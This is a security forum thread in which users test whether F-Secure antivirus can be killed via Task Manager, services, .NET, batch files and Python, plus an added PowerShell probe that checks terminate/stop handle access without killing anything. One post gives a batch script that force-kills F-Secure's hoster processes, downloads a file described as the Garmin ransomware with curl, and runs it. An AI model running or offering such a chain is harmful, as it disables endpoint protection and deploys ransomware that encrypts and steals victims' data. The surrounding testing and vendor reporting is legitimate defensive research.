On the topic of terminating F-Secure processes....

MacDefender

Level 14
Verified
Oct 13, 2019
685
Oftentimes, users are unsettled that, with F-Secure, you can "kill" F-Secure in Task Manager by terminating the F-Secure/Ultralight Hoster processes. This is definitely true, but it doesn't necessarily mean malware can do the same.


Here are some tests. At the conclusion of each test, I tried to execute a script that downloads an EICAR test file and executes it, instead of trusting the Windows Security Center status:

Test #1: Kill in Task Manager: F-Secure Killed
Test #2: Use Services.msc, stop the F-Secure related services: F-Secure killed.
Test #3: Use .NET executable, kill "fshoster" and "fshoster64" processes: Protected. DeepGuard triggered, "Tried to change another application"



Test #4: Use .NET executable, stop F-Secure services: Protected, DeepGuard triggered, "Tried to change another application"


Test #5: Use a batch file and taskkill or net stop to do the same thing as tests 3 and 4: F-Secure terminated, protection lost
Test #6: Use a Python script (Python from the Windows Store) and shell out to taskkill or net stop to do the same thing as tests 3 and 4: F-Secure terminated, protection lost



Conclusion:

DeepGuard stops certain methods of killing F-Secure but not others, pretty consistent with DeepGuard's strengths and weaknesses. This protection is relatively weak and can easily be defeated by use of trusted binaries to do the dirty work.
 


MacDefender

Can you try Eset, Kaspersky and Norton?
If I have time I might, but last time I looked, all 3 of those products have protection against being killed. Even if you're an elevated process, they reject attempts to kill or stop them except via their uninstaller, which then requires you to click some sort of dialog to acknowledge the action.


F-Secure is kind of unique for this test in that it's one of the few modern AV software that doesn't implement any kind of self-protection except the behavior blocker component.
 

MacDefender

I tried with Norton. Can't be killed with Task Manager, service can't be stopped (access denied), taskkill denied. The other ones idk
If you can't kill it with Task Manager or the service manager, none of these techniques will work. AVs with self-protection are hooking into Windows to deny attempts to kill their processes at a fundamental level.
 
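The post above describes the difference between a product whose processes and services simply accept a kill or stop request and one that denies the request at the Windows handle layer. The script below is an added example, not code from the thread or from any vendor: it is a non-destructive probe that asks Windows for a PROCESS_TERMINATE handle on the product's processes and a SERVICE_STOP handle on its services, records whether the handle was granted or denied, and closes the handle without using it. The process names fshoster32/fshoster64 are the ones mentioned in the thread; the 'F-Secure*' service display-name filter is an assumption, adjust it for the product under test. Run it elevated, in a lab VM.

```powershell
# Added example, not code from the thread. Probes handle-layer self-protection without
# terminating or stopping anything: a denied PROCESS_TERMINATE / SERVICE_STOP handle is
# what a product that strips those rights looks like; a granted handle is the situation
# the thread describes for F-Secure. Run elevated, in a lab VM.
# Assumptions: process names fshoster32/fshoster64 are taken from the thread; the
# 'F-Secure*' display-name filter for services is a guess, change it for your product.

$Native = @'
[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, int dwProcessId);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool CloseHandle(IntPtr hObject);
[DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
public static extern IntPtr OpenSCManager(string machineName, string databaseName, uint dwDesiredAccess);
[DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
public static extern IntPtr OpenService(IntPtr hSCManager, string lpServiceName, uint dwDesiredAccess);
[DllImport("advapi32.dll", SetLastError = true)]
public static extern bool CloseServiceHandle(IntPtr hSCObject);
'@
$Win32 = Add-Type -MemberDefinition $Native -Name 'TamperProbe' -Namespace 'SelfProtectionCheck' -PassThru

$PROCESS_TERMINATE   = 0x0001   # the only right we ask for: can we even get a handle that could kill it?
$SC_MANAGER_CONNECT  = 0x0001
$SERVICE_STOP        = 0x0020
$ERROR_ACCESS_DENIED = 5

function Get-ProbeResult {
    param([IntPtr]$Handle, [int]$Win32Error, [string]$Right)
    if ($Handle -ne [IntPtr]::Zero)        { return "$Right handle GRANTED (no handle-layer self-protection)" }
    if ($Win32Error -eq $ERROR_ACCESS_DENIED) { return "$Right denied (self-protection likely active)" }
    return "$Right open failed, Win32 error $Win32Error"
}

function Test-ProcessTerminateAccess {
    param([string[]]$ProcessName = @('fshoster32', 'fshoster64'))
    foreach ($name in $ProcessName) {
        $procs = @(Get-Process -Name $name -ErrorAction SilentlyContinue)
        if ($procs.Count -eq 0) {
            [pscustomobject]@{ Target = $name; Id = $null; Result = 'not running' }
            continue
        }
        foreach ($p in $procs) {
            $h   = $Win32::OpenProcess($PROCESS_TERMINATE, $false, $p.Id)
            $err = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
            if ($h -ne [IntPtr]::Zero) { [void]$Win32::CloseHandle($h) }   # never call TerminateProcess
            [pscustomobject]@{ Target = $name; Id = $p.Id; Result = (Get-ProbeResult $h $err 'PROCESS_TERMINATE') }
        }
    }
}

function Test-ServiceStopAccess {
    param([string]$DisplayNameFilter = 'F-Secure*')   # assumption, adjust for the product under test
    $scm = $Win32::OpenSCManager($null, $null, $SC_MANAGER_CONNECT)
    if ($scm -eq [IntPtr]::Zero) {
        throw "OpenSCManager failed, Win32 error $([Runtime.InteropServices.Marshal]::GetLastWin32Error())"
    }
    try {
        foreach ($svc in (Get-Service | Where-Object { $_.DisplayName -like $DisplayNameFilter })) {
            $h   = $Win32::OpenService($scm, $svc.Name, $SERVICE_STOP)
            $err = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
            if ($h -ne [IntPtr]::Zero) { [void]$Win32::CloseServiceHandle($h) }   # never call ControlService
            [pscustomobject]@{ Target = $svc.Name; Id = $svc.Status; Result = (Get-ProbeResult $h $err 'SERVICE_STOP') }
        }
    } finally {
        [void]$Win32::CloseServiceHandle($scm)
    }
}

Test-ProcessTerminateAccess | Format-Table -AutoSize
Test-ServiceStopAccess      | Format-Table -AutoSize
```

Read the output with the thread's results in mind: "access denied" on OpenProcess/OpenService is the Norton-style behaviour described above (the right is stripped before any kill can be attempted). A granted handle is the necessary-but-not-sufficient condition for the taskkill and net stop paths that worked against F-Secure; it does not by itself prove a kill would succeed, because a product can still intervene later, which is exactly what DeepGuard did on the .NET Process.Kill path while letting the batch-file path through.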

peterfat111

Level 7
Mar 25, 2021
341
If I have time I might, but last time I looked, all 3 of those products have protection against being killed. Even if you're an elevated process, they reject attempts to kill or stop them except via their uninstaller, which then requires you to click some sort of dialog to acknowledge the action.


F-Secure is kind of unique for this test in that it's one of the few modern AV software that doesn't implement any kind of self-protection except the behavior blocker component.
Yeah, that could be attacked very easily since it can be stopped so easily. F-Secure should really work on that.
 

upnorth

Moderator
Verified
Staff member
Malware Hunter
Jul 27, 2015
4,444
Agreed! It would be nice if DeepGuard could block every attempt to kill F-Secure , but it doesn’t. It seems really easy to implement this kind of industry standard anti-tamper.
True, and very well a possible solution.

But important enough to know: with a SUA (standard user account), the same that I myself use 24/7, you can't kill F-Secure without correct admin credentials or an elevation bypass. But I still got curious enough and slapped F-Secure with a real live malware sample on the admin account, and the result was not what I expected. F-Secure failed hard even with the Ultralight service up and running. Report sent. (y)🤞
 

upnorth

it is a little disturbing to know you can stop fsecure .......
To be fair towards any AV, in the Hub we had samples that were able to completely uninstall them without any need for user interaction, and that would have been immensely harder on a SUA. But in this specific case, with how F-Secure handles its self-protection, it for sure needs improvement.
 

gery79

Level 10
Verified
Jun 21, 2011
474
To be fair towards any AV, in the Hub we had samples that were able to completely uninstall them without any need for user interaction, and that would have been immensely harder on a SUA. But in this specific case, with how F-Secure handles its self-protection, it for sure needs improvement.
bruh
 

MacDefender

Yeah, to be fair, I've not tried to extensively attack any of the other AVs and their self-protection recently. A few years ago I did spend about half a day removing Sophos from a server. It wasn't easy, but it was something malware can do with admin rights.

My main goal here was to test the vendor’s claim that they don’t need self protection because their behavior blocker works as self protection. Obviously as shown, there’s some truth and some holes to that idea.
 

Andrew3000

Level 8
Verified
Feb 8, 2016
349
A very simple way to bypass f-secure:
In this case you use garmin.exe, which is the ransomware that hit the well-known company.
Do not run the command in any way on non-virtualized PCs. The malware encrypts all files and sensitive data can then be stolen.
How to use it?
Just copy the code below and put it into a .bat file and execute as admin. (remove XX and [ ] from the link)
Issue already reported to f-secure

Code:
taskkill /F /IM fshoster32.exe /T
taskkill /F /IM fshoster64.exe /T

curl.exe --output garmin.exe --url
taskkill /F /IM fshoster32.exe /T
taskkill /F /IM fshoster64.exe /T

garmin.exe
taskkill /F /IM fshoster32.exe /T
taskkill /F /IM fshoster64.exe /T
 

upnorth

A very simple way to bypass f-secure:
In this case you use garmin.exe, which is the ransomware that hit the well-known company.
Do not run the command in any way on non-virtualized PCs. The malware encrypts all files and sensitive data can then be stolen.
How to use it?
Just copy the code below and put it into a .bat file and execute as admin. (remove XX and [ ] from the link)
Issue already reported to f-secure
Partially correct, but that won't work unless one actually has the correct admin credentials or a working elevation bypass. That is extremely far from "simple".

As mentioned already several times in this thread alone, this issue only works on the admin account. Sure, it's always good with reports, but with constant repeats it starts getting redundant and F-Secure risks not wanting to jump into this thread. As I already got a reply with some answers and I genuinely want this thread to stay open, please try to show a little patience and I promise to add that info as soon as I have hopefully heard a bit more.

As of now, I can say this, they are fully aware of the issue.
 

MacDefender

I already got a reply with some answers and I genuinely want this thread to stay open, please try to show a little patience and I promise to add that info as soon as I have hopefully heard a bit more.

As of now, I can say this, they are fully aware of the issue.
Thanks, looking forward to this! FWIW if you’ve got a channel of communication with F-Secure, I am curious if they have plans for addressing how DeepGuard seems totally blind to BAT files as well as certain script engines like Python or Chrome V8. If DeepGuard protected those paths as aggressively as we see DeepGuard reacting to malicious EXE/Doc/VBS actors, I think that would be hugely beneficial.
 

upnorth

Thanks, looking forward to this! FWIW if you’ve got a channel of communication with F-Secure, I am curious if they have plans for addressing how DeepGuard seems totally blind to BAT files as well as certain script engines like Python or Chrome V8. If DeepGuard protected those paths as aggressively as we see DeepGuard reacting to malicious EXE/Doc/VBS actors, I think that would be hugely beneficial.
I also got the feeling that detection of malicious BAT files, for example, is something that needs to be improved, but 100% totally blind I can't say, because F-Secure does actually catch even those from time to time, as can clearly be seen here:
 